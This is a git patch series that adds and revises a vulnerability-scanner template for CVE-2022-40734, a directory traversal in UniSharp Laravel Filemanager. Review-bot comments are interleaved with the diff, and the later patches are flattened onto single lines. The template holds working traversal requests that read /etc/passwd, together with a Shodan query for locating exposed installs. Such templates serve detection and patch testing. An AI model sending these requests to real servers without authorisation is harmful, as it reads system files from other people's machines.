From 800a6fea60dd0ab4475df5788d31b79897cf93ea Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:14:40 +0530
Subject: [PATCH 1/3] Create CVE-2022-40734.yaml
---
cves/2022/CVE-2022-40734.yaml | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 cves/2022/CVE-2022-40734.yaml
diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
new file mode 100644
index 0000000000..95ad0826f7
--- /dev/null
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -0,0 +1,28 @@
+id: CVE-2022-40734
+
+info:
+ name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.
+ author: arafatansari
+ severity: high
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
+ - https://github.com/UniSharp/laravel-filemanager/issues/1150
+ description: |
+ UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
+ tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+ - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 0d3cbfcc36161aac3e0b08e71116cc42a666c6ca Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:23:15 +0530
Subject: [PATCH 2/3] Update CVE-2022-40734.yaml
---
cves/2022/CVE-2022-40734.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
index 95ad0826f7..cd78a9bacf 100644
--- a/cves/2022/CVE-2022-40734.yaml
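Review bot: In PATCH 1/3, both `path` entries under `requests` read only `/etc/passwd` and the sole content matcher is the passwd-style regex, so the template can confirm the issue only on Unix-like hosts; a clean result against an install on another platform is inconclusive rather than negative. I would state that limit in the template, for example `# Confirms the traversal on Unix-like targets only; no match elsewhere does not mean the host is patched.` above `requests:`. The `unauthenticated` tag is also not backed by the description text in this hunk, so it should be checked against the linked upstream issue before findings are prioritised on it.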
+++ b/cves/2022/CVE-2022-40734.yaml @@ -3,12 +3,15 @@ id: CVE-2022-40734 info: name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal. author: arafatansari + description: | + UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. severity: high reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734 - https://github.com/UniSharp/laravel-filemanager/issues/1150 - description: | - UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. + metadata: + shodan-query: http.html:"Laravel Filemanager" + verified: true tags: traversal,unauthenticated,laravel,unisharp,cve,2022 requests: From 4f7d31b4ec188eeb048ed513b5743d27f401428e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 15 Sep 2022 14:24:40 +0530 Subject: [PATCH 3/3] Update CVE-2022-40734.yaml --- cves/2022/CVE-2022-40734.yaml | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml index cd78a9bacf..4fae3434f1 100644 --- a/cves/2022/CVE-2022-40734.yaml +++ b/cves/2022/CVE-2022-40734.yaml 
@@ -1,18 +1,20 @@ id: CVE-2022-40734 info: - name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal. + name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal author: arafatansari + severity: high description: | UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. - severity: high reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734 - https://github.com/UniSharp/laravel-filemanager/issues/1150 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 + classification: + cve-id: CVE-2022-40734 metadata: - shodan-query: http.html:"Laravel Filemanager" verified: true - tags: traversal,unauthenticated,laravel,unisharp,cve,2022 + shodan-query: http.html:"Laravel Filemanager" + tags: cve,cve2022,laravel,unisharp,lfi,traversal requests: - method: GET @@ -20,12 +22,8 @@ requests: - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" - matchers-condition: and + stop-at-first-match: true matchers: - type: regex regex: - "root:[x*]:0:0" - - - type: status - status: - - 200
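Review bot: The new `classification` block holds only `cve-id`, so `severity: high` in `info` has no score in the template to justify it. I would add `cwe-id: CWE-22` and the `cvss-metrics` / `cvss-score` values from the NVD entry this hunk adds under `reference`, and set `severity` to agree with that score. `name` still reads `v2.5.1` while the description says `through 2.5.1`; `name: UniSharp Laravel Filemanager <=2.5.1 - Directory Traversal` would match it. A `remediation:` line naming the fixed release (not shown on this page) would tell whoever triages a hit what to do next.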
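Review bot: Removing the `status: 200` matcher together with `matchers-condition: and` in the second hunk leaves the unanchored body regex `root:[x*]:0:0` as the only evidence for a finding, and the commit message (`Update CVE-2022-40734.yaml`) does not say why the status check was dropped. If it was removed because affected installs answer with a different status code, a short comment such as `# status not checked: <reason>` above `matchers:` would record that; otherwise I would keep the status check so a hit requires both signals. Stating `part: body` on the regex matcher would also make the matched part explicit instead of relying on the default.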